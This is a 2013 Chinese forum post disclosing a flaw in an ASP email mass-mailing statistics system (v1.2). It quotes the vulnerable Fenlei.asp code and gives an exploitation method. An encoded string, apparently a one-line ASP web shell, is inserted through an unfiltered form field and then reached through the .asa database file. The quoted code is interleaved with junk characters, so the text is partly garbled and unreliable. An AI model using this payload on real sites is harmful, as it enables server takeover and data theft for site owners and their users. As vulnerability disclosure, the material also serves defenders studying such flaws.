找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1855|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ; x0 C% G# @6 u8 L
; x5 N3 L1 R5 n) J2 B
IF Request.QueryString("Action")="del" Then $ A7 S! t; C: W# F: J4 S
ID=Request.QueryString("ID") 4 ^# q: f, ^5 [! r- v; Q, C. L  Z( z
IF Countss ("tui","Fenlei",ID )<>0 then : F* J0 ~: x! b. S+ R
'略 ( a$ J' b) N5 D, P7 F( V
IF Request.QueryString("Action")="Add" Then
9 L; ?8 Y- g) L1 kTname=Request.Form("Typename")
& r; f! p: g/ O5 VSet Rs=Server.CreateObject("adodb.Recordset")
# w; N" v) a) USql="Select * From Fenlei Order by id Desc "
2 o9 y3 z$ i, c# GRs.Open Sql,Conn,1,3 ! h4 j2 a; |$ j9 H, B6 ?. Z! K
Rs.Addnew + D: q+ q4 @, ?; i% g5 n
Rs("Typename")=Tname , I4 T" Y( Q+ W- v$ b
'略
* Y( D0 ^+ H- F' I# d6 Q# SSet Rs=Server.CreateObject("adodb.Recordset")
6 b5 ~9 D; l/ \8 pSql="Select * From Fenlei Order by id Desc " 3 v; b: k) B5 \! M
Rs.Open Sql,Conn,1,1 1 G% Z- b* r% `- Z
'略
' f1 @1 u: k0 [  a* U& ^  D( `, N3 U. f%>$ p% W4 H/ U' u9 Y4 {# ~
! l! p& @% L9 R/ A3 B% [
9 N/ @/ F* p+ [# A7 |7 l8 D& y7 T) {" r

* k) u' q2 y! N/ j# V* H1 M2 R没有过滤,直接写入数据库。& B+ C5 \' L' L: r9 u
5 J5 ~. u; S, ]' [! R4 ]
利用方法:! c! I/ E: _7 ^/ Q
* M- N+ \  A$ ]% q+ ]4 y1 f% ~3 P
插入:┼攠數畣整爠煥敵瑳∨≡┩>
! i  K1 ^4 [$ u* q) E: o8 U
' U1 I% L2 D2 {& r: p& ^9 N* ~
. t& m; J- p7 z6 [( |  A; E连接: http://www.xxx.com/###tongbaner.asa : }2 v! o# q; i' E
'默认安装文件: 8 Y+ Y9 ^- Z/ o) w3 }1 _% }6 e
'install.asp
( c7 N: \9 v# F! ^+ P; @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表